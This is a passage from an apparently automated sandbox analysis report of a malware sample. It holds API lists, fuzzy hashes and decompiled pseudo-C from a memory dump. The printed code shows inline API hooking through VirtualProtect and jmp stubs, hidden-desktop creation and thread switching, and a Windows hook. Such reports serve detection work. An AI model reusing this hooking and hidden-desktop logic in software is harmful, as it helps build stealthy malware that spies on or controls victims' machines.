                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcmpi
                                          • String ID: CreateDXGIFactory1$D3D10CreateDevice1$Direct3DCreate9$Direct3DCreate9Ex
                                          • API String ID: 1586166983-74941414
                                          • Opcode ID: ce584eecf9887a53cd8ba29bffa45e051693dcd0b0ed8fa246d4c1685dc17899
                                          • Instruction ID: 6e85a0df4d508ec040cab583a821455291ceff0124946b85ba3a8190d99140b9
                                          • Opcode Fuzzy Hash: ce584eecf9887a53cd8ba29bffa45e051693dcd0b0ed8fa246d4c1685dc17899
                                          • Instruction Fuzzy Hash: D0116121308B4282FB259F16EDD47792365EB84BC4F888621DD1A87B14EF3CC94AD354
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Rect$CreateDeleteObject$CombineIntersectSleep
                                          • String ID:
                                          • API String ID: 1191493533-0
                                          • Opcode ID: dd1f6d5cc443e8843cefde764eaaca30f1c778651b0492abbc76f6d94043f8ce
                                          • Instruction ID: 1165065fcaa13a9a8f8977481ab67aac01c9824d2b91266b2d6b43f9a475ccd5
                                          • Opcode Fuzzy Hash: dd1f6d5cc443e8843cefde764eaaca30f1c778651b0492abbc76f6d94043f8ce
                                          • Instruction Fuzzy Hash: 4C614A36B006408FE714CFB9E894BAD37B5F798B8CF508129DE0A97B58DE399506CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 32%
                                          			E00C62DA4(void* __esi, int __rbx, long long __rcx, intOrPtr __rdx, int __rdi, int __rsi, void* __rbp, long long __r9, int __r12, void* _a8, void* _a16, void* _a24, void* _a32) {
                                          				long long _v32;
                                          				long long _v40;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				long _v56;
                                          				long _t60;
                                          				int _t64;
                                          				signed int _t68;
                                          				int* _t91;
                                          				long long _t92;
                                          				long long _t95;
                                          				long long _t100;
                                          				long long _t106;
                                          				intOrPtr _t115;
                                          				intOrPtr _t116;
                                          				long long _t118;
                                          				long long _t121;
                                          				int* _t124;
                                          				intOrPtr _t134;
                                          				intOrPtr _t138;
                                          				int* _t140;
                                          				long long _t143;
                                          
                                          				_t123 = __rbp;
                                          				_t118 = __rdi;
                                          				_t115 = __rdx;
                                          				_t98 = __rbx;
                                          				_t91 = _t124;
                                          				_t91[2] = __rbx;
                                          				_t91[4] = __rsi;
                                          				_t91[6] = __rdi;
                                          				_t91[8] = __r12;
                                          				_t121 = __r9;
                                          				_t68 = r8d;
                                          				_t134 = __rdx;
                                          				_t143 = __rcx;
                                          				_t80 =  *(__rcx + 8) & 0x00000001;
                                          				if(( *(__rcx + 8) & 0x00000001) == 0) {
                                          					_t115 =  *((intOrPtr*)(__rcx + 0x10));
                                          					E00C6412C(__eflags, _t91, __rbx, __rdx, _t115, __r9, __rbp);
                                          				} else {
                                          					E00C641D4( *(__rcx + 0x18) & 0x0000ffff, _t80, _t91, __rbx, __rdx, __rdx);
                                          				}
                                          				_t140 = _t91;
                                          				if(_t91 == 0) {
                                          					_t60 = 2;
                                          					goto L22;
                                          				} else {
                                          					_v48 = _v48 & 0x00000000;
                                          					_t13 = _t115 + 0x3c; // 0x40
                                          					r8d = _t13;
                                          					if(VirtualProtect(??, ??, ??, ??) == 0) {
                                          						_t60 = GetLastError();
                                          						goto L22;
                                          					} else {
                                          						 *((long long*)(_t121 + 0x30)) = _t143;
                                          						_t92 = _t91 + _t134;
                                          						 *((long long*)(_t121 + 0x10)) = _t92;
                                          						 *(_t121 + 0x18) = _t140;
                                          						 *((long long*)(_t121 + 0x20)) = _t92;
                                          						r8d = _t68;
                                          						_t116 = _t134;
                                          						_t60 = E00C62714(_t98, _t143, _t116, _t121, _t123, _t121);
                                          						_v56 = _t60;
                                          						if(_t60 == 1) {
                                          							_t138 =  *((intOrPtr*)(_t121 + 0x10));
                                          							_v40 = _t118;
                                          							_t64 = E00C64360(0x22000020, _t98, _t134, _t116, _t121, _t123);
                                          							_t106 = _t92;
                                          							_v32 = _t92;
                                          							while(1) {
                                          								L7:
                                          								while(_t106 != 0) {
                                          									if(_t118 != 0 ||  *(_t106 + 0x10) < 0xe) {
                                          										L15:
                                          										_t100 =  *_t106;
                                          										E00C61E84();
                                          										_t106 = _t100;
                                          										_v32 = _t100;
                                          										goto L7;
                                          									} else {
                                          										_t118 =  *((intOrPtr*)(_t106 + 8));
                                          										_v40 = _t118;
                                          										if( *_t118 != 0x25ff ||  *(_t118 + 2) != 0 ||  *((intOrPtr*)(_t118 + 6)) == _t138) {
                                          											goto L15;
                                          										} else {
                                          											 *((long long*)(_t106 + 8)) = _t118 + 0xe;
                                          											_t64 = _t116 - 0xe;
                                          											 *(_t106 + 0x10) = _t64;
                                          											_v40 = _t118;
                                          											continue;
                                          										}
                                          									}
                                          									L22:
                                          									_v56 = _t60;
                                          									goto L23;
                                          								}
                                          								__eflags = _t118;
                                          								if(_t118 != 0) {
                                          									_t34 = _t116 + 0x32; // 0x40
                                          									r8d = _t34;
                                          									_t64 = VirtualProtect(??, ??, ??, ??);
                                          									__eflags = _t64;
                                          									if(_t64 != 0) {
                                          										 *(_t118 + 2) =  *(_t118 + 2) & 0x00000000;
                                          										 *((long long*)(_t118 + 6)) =  *((intOrPtr*)(_t121 + 0x28));
                                          										 *_t118 = 0x25ff;
                                          										 *((long long*)(_t121 + 0x28)) = _t118;
                                          										 *((long long*)(_t143 + 0x28)) = _t118;
                                          										r8d = _v52;
                                          										__eflags = r8d - 0x40;
                                          										r8d =  !=  ? 0x20 : r8d;
                                          										_v52 = r8d;
                                          										_t64 = VirtualProtect(??, ??, ??, ??);
                                          									}
                                          								}
                                          								 *_t140 = _t64;
                                          								r8d = _v48;
                                          								VirtualProtect(??, ??, ??, ??);
                                          								 *(_t121 + 0x38) =  *(_t121 + 0x38) | 0x00000102;
                                          								EnterCriticalSection(??);
                                          								_t95 =  *0xc95ab0; // 0xc95ab0
                                          								 *_t121 = _t95;
                                          								 *((long long*)(_t121 + 8)) = 0xc95ab0;
                                          								 *((long long*)(_t95 + 8)) = _t121;
                                          								 *0xc95ab0 = _t121;
                                          								LeaveCriticalSection(??);
                                          								 *((long long*)(_t143 + 0x30)) =  *((intOrPtr*)(_t121 + 0x20)) + _t134;
                                          								_t60 = 0;
                                          								goto L22;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				L23:
                                          				return _t60;
                                          			}
                                          Instruction addresses: 0x00c62da4, 0x00c62da4, 0x00c62da4, 0x00c62da4, 0x00c62da4, 0x00c62da7, 0x00c62dab, 0x00c62daf, 0x00c62db3, 0x00c62dc1,
                                          0x00c62dc4, 0x00c62dc7, 0x00c62dca, 0x00c62dcd, 0x00c62dd1, 0x00c62de1, 0x00c62de8, 0x00c62dd3, 0x00c62dda, 0x00c62dda,
                                          0x00c62ded, 0x00c62df3, 0x00c62fa7, 0x00000000, 0x00c62df9, 0x00c62df9, 0x00c62e08, 0x00c62e08, 0x00c62e17, 0x00c62f9f,
                                          0x00000000, 0x00c62e1d, 0x00c62e1d, 0x00c62e24, 0x00c62e27, 0x00c62e2b, 0x00c62e32, 0x00c62e39, 0x00c62e3c, 0x00c62e42,
                                          0x00c62e47, 0x00c62e4e, 0x00c62e54, 0x00c62e5a, 0x00c62e67, 0x00c62e6c, 0x00c62e6f, 0x00c62e74, 0x00c62e74, 0x00c62e79,
                                          0x00c62e81, 0x00c62ebc, 0x00c62ebc, 0x00c62ebf, 0x00c62ec4, 0x00c62ec7, 0x00000000, 0x00c62e8b, 0x00c62e8b, 0x00c62e8f,
                                          0x00c62e97, 0x00000000, 0x00c62ea5, 0x00c62ea9, 0x00c62ead, 0x00c62eb0, 0x00c62eb5, 0x00000000, 0x00c62eb5, 0x00c62e97,
                                          0x00c62fac, 0x00c62fac, 0x00000000, 0x00c62fac, 0x00c62ece, 0x00c62ed1, 0x00c62edd, 0x00c62edd, 0x00c62ee4, 0x00c62eea,
                                          0x00c62eec, 0x00c62eee, 0x00c62ef6, 0x00c62efa, 0x00c62efd, 0x00c62f01, 0x00c62f05, 0x00c62f0f, 0x00c62f13, 0x00c62f17,
                                          0x00c62f27, 0x00c62f27, 0x00c62eec, 0x00c62f34, 0x00c62f3c, 0x00c62f49, 0x00c62f4f, 0x00c62f5d, 0x00c62f63, 0x00c62f6a,
                                          0x00c62f74, 0x00c62f78, 0x00c62f7c, 0x00c62f8a, 0x00c62f97, 0x00c62f9b, 0x00000000, 0x00c62f9b, 0x00c62e74, 0x00c62e4e,
                                          0x00c62e17, 0x00c62fb0, 0x00c62fd4

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual$CriticalSection$EnterLeave
                                          • String ID:
                                          • API String ID: 1801948497-0
                                          • Opcode ID: ff7e910166a6830e842cb8f13f0e5eb7b5e687ca2c3e02578f7e5426a1f0bb2c
                                          • Instruction ID: e50a4c407b3620d1acdb1751dbf674d9a869e986f4b88dc18dbc6c44be8d92be
                                          • Opcode Fuzzy Hash: ff7e910166a6830e842cb8f13f0e5eb7b5e687ca2c3e02578f7e5426a1f0bb2c
                                          • Instruction Fuzzy Hash: 03517D32214B4086EB34CF12E98471EB3B4F788B85F548226EF9A43B64DF38D956CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 49%
                                          			E00C7F758(void* __esi, void* __ebp, void* __eflags, DWORD* __rax, long long __rbx, long long __rcx, long long* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24, long _a32) {
                                          				void* __rdi;
                                          				long _t17;
                                          				long _t26;
                                          				long _t27;
                                          				long _t28;
                                          				long _t29;
                                          				long _t31;
                                          				long _t32;
                                          				int _t33;
                                          				void* _t41;
                                          				void* _t42;
                                          				DWORD* _t57;
                                          				long long _t77;
                                          				DWORD* _t79;
                                          				void* _t82;
                                          				void* _t87;
                                          				void* _t89;
                                          				long long* _t91;
                                          				long long _t92;
                                          
                                          				_t87 = __r8;
                                          				_t58 = __rbx;
                                          				_t57 = __rax;
                                          				_t42 = __ebp;
                                          				_t41 = __esi;
                                          				_a8 = __rbx;
                                          				_a16 = __rbp;
                                          				_a24 = __rsi;
                                          				_t82 = __r8;
                                          				_t91 = __rdx;
                                          				_t92 = __rcx;
                                          				_t17 = GetTickCount();
                                          				_t4 = _t77 + 1; // 0x1
                                          				r9d = _t4;
                                          				r8d = 0;
                                          				_a32 = _t17;
                                          				E00C77E6C(__eflags, __rbx,  &_a32, __rdx, _t77, __rsi, __r8, __r8);
                                          				_t79 = _t57;
                                          				if(_t57 == 0) {
                                          					L10:
                                          					_t32 = GetLastError();
                                          					L11:
                                          					if(_t79 != 0) {
                                          						HeapFree();
                                          					}
                                          					if(_t32 != 0 && _t77 != 0) {
                                          						E00C7F6A8();
                                          					}
                                          					return _t32;
                                          				}
                                          				_t33 = lstrlenA();
                                          				_t7 = _t57 + 1; // 0x1
                                          				r8d = _t7;
                                          				_t89 = _t87 + 0x778;
                                          				HeapAlloc(??, ??, ??);
                                          				_t77 = _t57;
                                          				if(_t57 == 0) {
                                          					goto L10;
                                          				}
                                          				r8d = 0x778;
                                          				memset(??, ??, ??);
                                          				r8d = 0;
                                          				 *((long long*)(_t77 + 8)) = _t92;
                                          				CreateMutexA(??, ??, ??);
                                          				 *((long long*)(_t77 + 0x10)) = _t57;
                                          				if(_t57 == 0) {
                                          					goto L10;
                                          				}
                                          				_t90 = _t82;
                                          				r8d = _t33;
                                          				_t26 = E00C7D800(_t58, _t77, _t79, _t82);
                                          				_t32 = _t26;
                                          				if(_t26 == 0) {
                                          					r8d =  *((intOrPtr*)(_t77 + 0x2a0));
                                          					_t11 = _t77 + 0x18; // 0x18
                                          					_t76 = _t11;
                                          					_t13 = _t57 + 1; // 0x1
                                          					r9d = _t13;
                                          					_t27 = E00C788A0(_t57, _t58, _t11);
                                          					_t32 = _t27;
                                          					if(_t27 == 0) {
                                          						E00C7F500();
                                          						_t28 = E00C825BC(_t32, 0, _t57, _t58, _t77, _t79, _t89, _t90);
                                          						_t32 = _t28;
                                          						if(_t28 == 0) {
                                          							_t29 = E00C7DED4(_t41, _t42, _t58, _t77, _t76, _t77, _t79, _t82, _t89, _t90);
                                          							_t32 = _t29;
                                          							if(_t29 == 0) {
                                          								E00C833C0(_t77);
                                          								_t31 = E00C7D428(_t57, _t58, _t77);
                                          								_t32 = _t31;
                                          								if(_t31 == 0) {
                                          									 *_t91 = _t77;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				if(_t32 != 0xffffffff) {
                                          					goto L11;
                                          				}
                                          				goto L10;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00C7F77B
                                            • Part of subcall function 00C77E6C: lstrlenA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EBD
                                            • Part of subcall function 00C77E6C: lstrlenA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77ECD
                                            • Part of subcall function 00C77E6C: HeapAlloc.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EE1
                                            • Part of subcall function 00C77E6C: lstrcpyA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EFD
                                            • Part of subcall function 00C77E6C: lstrcatA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F09
                                            • Part of subcall function 00C77E6C: lstrcatA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F1A
                                            • Part of subcall function 00C77E6C: HeapFree.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F2C
                                          • lstrlenA.KERNEL32(?,?,?,00C6C267), ref: 00C7F7A7
                                          • HeapAlloc.KERNEL32(?,?,?,00C6C267), ref: 00C7F7C3
                                          • memset.NTDLL(?,?,?,00C6C267), ref: 00C7F7E0
                                          • CreateMutexA.KERNEL32(?,?,?,00C6C267), ref: 00C7F7F0
                                            • Part of subcall function 00C7D800: CreateDesktopA.USER32 ref: 00C7D844
                                            • Part of subcall function 00C7D800: GetLastError.KERNEL32 ref: 00C7D852
                                            • Part of subcall function 00C7D800: CloseDesktop.USER32 ref: 00C7D955
                                            • Part of subcall function 00C788A0: GetUserObjectInformationA.USER32 ref: 00C788E6
                                            • Part of subcall function 00C788A0: CreateEventA.KERNEL32 ref: 00C789E5
                                            • Part of subcall function 00C788A0: CreateEventA.KERNEL32 ref: 00C78A08
                                            • Part of subcall function 00C788A0: CreateMutexExA.KERNEL32 ref: 00C78A27
                                            • Part of subcall function 00C7F500: EnterCriticalSection.KERNEL32(?,?,00000000,00C7F83F,?,?,?,00C6C267), ref: 00C7F510
                                            • Part of subcall function 00C7DED4: GetVersion.KERNEL32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DEF7
                                            • Part of subcall function 00C7DED4: GetCurrentThreadId.KERNEL32 ref: 00C7DEFD
                                            • Part of subcall function 00C7DED4: GetThreadDesktop.USER32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF08
                                            • Part of subcall function 00C7DED4: SetThreadDesktop.USER32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF15
                                            • Part of subcall function 00C7DED4: GetLastError.KERNEL32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF1F
                                            • Part of subcall function 00C833C0: CreateThread.KERNEL32 ref: 00C833F1
                                            • Part of subcall function 00C7D428: CreateMutexA.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D43E
                                            • Part of subcall function 00C7D428: CreateEventA.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D45A
                                            • Part of subcall function 00C7D428: CreateThread.KERNEL32 ref: 00C7D483
                                            • Part of subcall function 00C7D428: GetLastError.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D495
                                            • Part of subcall function 00C7D428: CloseHandle.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D4AD
                                            • Part of subcall function 00C7D428: CloseHandle.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D4C7
                                          • GetLastError.KERNEL32(?,?,?,00C6C267), ref: 00C7F879
                                          • HeapFree.KERNEL32(?,?,?,00C6C267), ref: 00C7F892
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Create$Thread$DesktopErrorHeapLast$CloseEventMutexlstrlen$AllocFreeHandlelstrcat$CountCriticalCurrentEnterInformationObjectSectionTickUserVersionlstrcpymemset
                                          • String ID:
                                          • API String ID: 3949088790-0
                                          • Opcode ID: 446b54d96a23c14c2361a71ee0e8e0358d77f6f49c8e285defcba825d8f49efa
                                          • Instruction ID: d17f2c308b5d718380ae9da9c791afb904442a73ec88196183c0ce9037be9e4f
                                          • Opcode Fuzzy Hash: 446b54d96a23c14c2361a71ee0e8e0358d77f6f49c8e285defcba825d8f49efa
                                          • Instruction Fuzzy Hash: 9231B221704B4282EB15EBB7A9D473D63A1BB86FD0F44C1389E1D47B65EF38C9568701
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • HeapAlloc.KERNEL32(?,?,?,00C62011), ref: 00C6A227
                                          • GetVersion.KERNEL32(?,?,?,00C62011), ref: 00C6A243
                                          • SetWindowsHookExA.USER32 ref: 00C6A287
                                          • EnterCriticalSection.KERNEL32(?,?,?,00C62011), ref: 00C6A29D
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00C62011), ref: 00C6A2E0
                                          • HeapFree.KERNEL32(?,?,?,00C62011), ref: 00C6A2F6
                                          • GetLastError.KERNEL32(?,?,?,00C62011), ref: 00C6A30D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalHeapSection$AllocEnterErrorFreeHookLastLeaveVersionWindows
                                          • String ID:
                                          • API String ID: 1643053347-0
                                          • Opcode ID: 95b3d8248d3b6af5a434bb6a05eb2a6cd356ea2c0c6883e6dbd34b2c3726c283
                                          • Instruction ID: 6c01e0f9e964ee5ab1a2165ca2f3470061dbe5db2745068a49da142d37c59c81
                                          • Opcode Fuzzy Hash: 95b3d8248d3b6af5a434bb6a05eb2a6cd356ea2c0c6883e6dbd34b2c3726c283
                                          • Instruction Fuzzy Hash: 34316C72201F40C2EB24AF55F8A071873A1F788F84F988525DA5E93B24EF39CA95CB45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32(?,?,00000000,00C7AF25,?,?,?,00C7AE5F), ref: 00C7AD5F
                                          • lstrlenW.KERNEL32(?,?,00000000,00C7AF25,?,?,?,00C7AE5F), ref: 00C7AD82
                                          • HeapAlloc.KERNEL32(?,?,00000000,00C7AF25,?,?,?,00C7AE5F), ref: 00C7ADA3
                                          • lstrcpyW.KERNEL32 ref: 00C7ADB7
                                          • lstrcatW.KERNEL32 ref: 00C7ADD5
                                          • lstrcatW.KERNEL32 ref: 00C7ADE1
                                          • HeapFree.KERNEL32(?,?,00000000,00C7AF25,?,?,?,00C7AE5F), ref: 00C7ADF3
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heaplstrcatlstrlen$AllocFreelstrcpy
                                          • String ID:
                                          • API String ID: 3031435114-0
                                          • Opcode ID: 3c51ccfb869083e67b2dbbd7ef73e728c0b707ec9876932307712990fa6137ad
                                          • Instruction ID: 7a634e37dfcfe000272edd022fd47c0e5cf009b0a52cb11d679b3d024f842253
                                          • Opcode Fuzzy Hash: 3c51ccfb869083e67b2dbbd7ef73e728c0b707ec9876932307712990fa6137ad
                                          • Instruction Fuzzy Hash: 18219A65305B8582EB28DF56A948729B3A1BB9CFD1F88C125CE1A47F24EF3CC545C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E00C77E6C(void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                                          				char _v24;
                                          				int _t12;
                                          				char* _t35;
                                          				void* _t60;
                                          				char* _t62;
                                          				void* _t68;
                                          
                                          				_t35 = _t62;
                                          				 *((long long*)(_t35 + 8)) = __rbx;
                                          				 *((long long*)(_t35 + 0x10)) = __rbp;
                                          				 *((long long*)(_t35 + 0x18)) = __rsi;
                                          				 *((long long*)(_t35 + 0x20)) = __rdi;
                                          				_t68 = __rdx;
                                          				_t60 = __r8;
                                          				_t24 = 0x27;
                                          				E00C77E18(_t35 - 0x18, __rcx, __r8);
                                          				_t12 = E00C77F50(r9d, _t35, __rbx,  &_v24, __rcx, __rsi, __r8);
                                          				if(_t35 != 0) {
                                          					if(__rdx != 0) {
                                          						_t24 = 0x27 + lstrlenA();
                                          					}
                                          					if(_t60 != 0) {
                                          						_t24 = _t24 + lstrlenA();
                                          					}
                                          					r8d = _t24;
                                          					HeapAlloc(??, ??, ??);
                                          					if(_t35 != 0) {
                                          						 *_t35 = 0;
                                          						if(_t68 != 0) {
                                          							lstrcpyA();
                                          						}
                                          						lstrcatA();
                                          						if(_t60 != 0) {
                                          							lstrcatA();
                                          						}
                                          					}
                                          					_t12 = HeapFree();
                                          				}
                                          				return _t12;
                                          			}

                                          APIs
                                            • Part of subcall function 00C77F50: HeapAlloc.KERNEL32(?,?,?,?,?,?,00000000,00C77EAD,?,?,?,?,00000000,00C78917), ref: 00C77F76
                                            • Part of subcall function 00C77F50: wsprintfA.USER32 ref: 00C78046
                                          • lstrlenA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EBD
                                          • lstrlenA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77ECD
                                          • HeapAlloc.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EE1
                                          • lstrcpyA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EFD
                                          • lstrcatA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F09
                                          • lstrcatA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F1A
                                          • HeapFree.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F2C
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Alloclstrcatlstrlen$Freelstrcpywsprintf
                                          • String ID:
                                          • API String ID: 4068783096-0
                                          • Opcode ID: c8519489772c52442ece45d07fcdd414d080b8d25fb7c524eaf107ad070c8715
                                          • Instruction ID: 0b18eceb37eafa4d94421795bf7c079e966ccfb3d95db84cd380c996336eda1b
                                          • Opcode Fuzzy Hash: c8519489772c52442ece45d07fcdd414d080b8d25fb7c524eaf107ad070c8715
                                          • Instruction Fuzzy Hash: 2C21B436704B4085EB259F22E94472AA761BB88FD0F8DC220DE0D07B24DF3CC9468344
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 25%
                                          			E00C783FC(void* __ecx, void* __edx, void* __esi, long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r8, void* __r9, long long _a8, long long _a16, void* _a40, long long _a48) {
                                          				char _v24;
                                          				void* _t17;
                                          				void* _t18;
                                          				void* _t25;
                                          				long long* _t28;
                                          				void* _t44;
                                          				void* _t52;
                                          
                                          				_t52 = __r8;
                                          				_t29 = __rbx;
                                          				_t28 = __rax;
                                          				_t25 = __edx;
                                          				_a8 = __rbx;
                                          				_a16 = __rsi;
                                          				_t44 = __rdx;
                                          				if( *0xc95820 != 0) {
                                          					if(__rdx == 0 || _a48 == 0) {
                                          						_t18 = 0x80070057;
                                          					} else {
                                          						if(( *(__rcx + 0x10) & 0x00000002) == 0) {
                                          							if(( *(__rcx + 0x10) & 0x00000001) == 0) {
                                          								L8:
                                          								E00C784F4(_t25, _t29, _t44,  &_v24, _t52);
                                          								if(_t28 != 0) {
                                          									L12:
                                          									GetProcAddress();
                                          									if(_t28 == 0) {
                                          										_t18 = 0x800401f9;
                                          									} else {
                                          										_t18 =  *_t28();
                                          									}
                                          									L16:
                                          									return _t18;
                                          								}
                                          								GetModuleHandleW();
                                          								if(_t28 != 0) {
                                          									goto L12;
                                          								}
                                          								LoadLibraryW();
                                          								if(_t28 != 0) {
                                          									goto L12;
                                          								}
                                          								_t18 = 0x800401f8;
                                          								goto L16;
                                          							}
                                          							EnterCriticalSection();
                                          							E00C78398(_t17, __rbx, __rdx, __rcx, __rbp);
                                          							_t29 = _t28;
                                          							LeaveCriticalSection(??);
                                          							if(_t28 == 0) {
                                          								goto L5;
                                          							}
                                          							goto L8;
                                          						}
                                          						L5:
                                          						_t18 = 0x80040154;
                                          					}
                                          					goto L16;
                                          				}
                                          				_t18 = 0x8001010f;
                                          				goto L16;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: DllGetClassObject
                                          • API String ID: 0-1075368562
                                          • Opcode ID: 9d08b2cd46e27036f387f794faf523c5aaf47936fa1e0ecef0b645d30eca8681
                                          • Instruction ID: 3c37fd5755285eac951d81a678d9d064f6368c5e293baf63bfa658557b65b8d6
                                          • Opcode Fuzzy Hash: 9d08b2cd46e27036f387f794faf523c5aaf47936fa1e0ecef0b645d30eca8681
                                          • Instruction Fuzzy Hash: 55219521385B4282EE258705E52C7295790B784BC8F68C529EF5E07B74DFBCC54DC744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$InfoRect
                                          • String ID: <
                                          • API String ID: 689018761-4251816714
                                          • Opcode ID: 4a73d7d1cdc3c76b845095d37598cff86def0ee694c5e51e0da120284745aefe
                                          • Instruction ID: 7efd408702ea7365b89ec57dc8282ac16b57432c4b82b6ba33712edceee52508
                                          • Opcode Fuzzy Hash: 4a73d7d1cdc3c76b845095d37598cff86def0ee694c5e51e0da120284745aefe
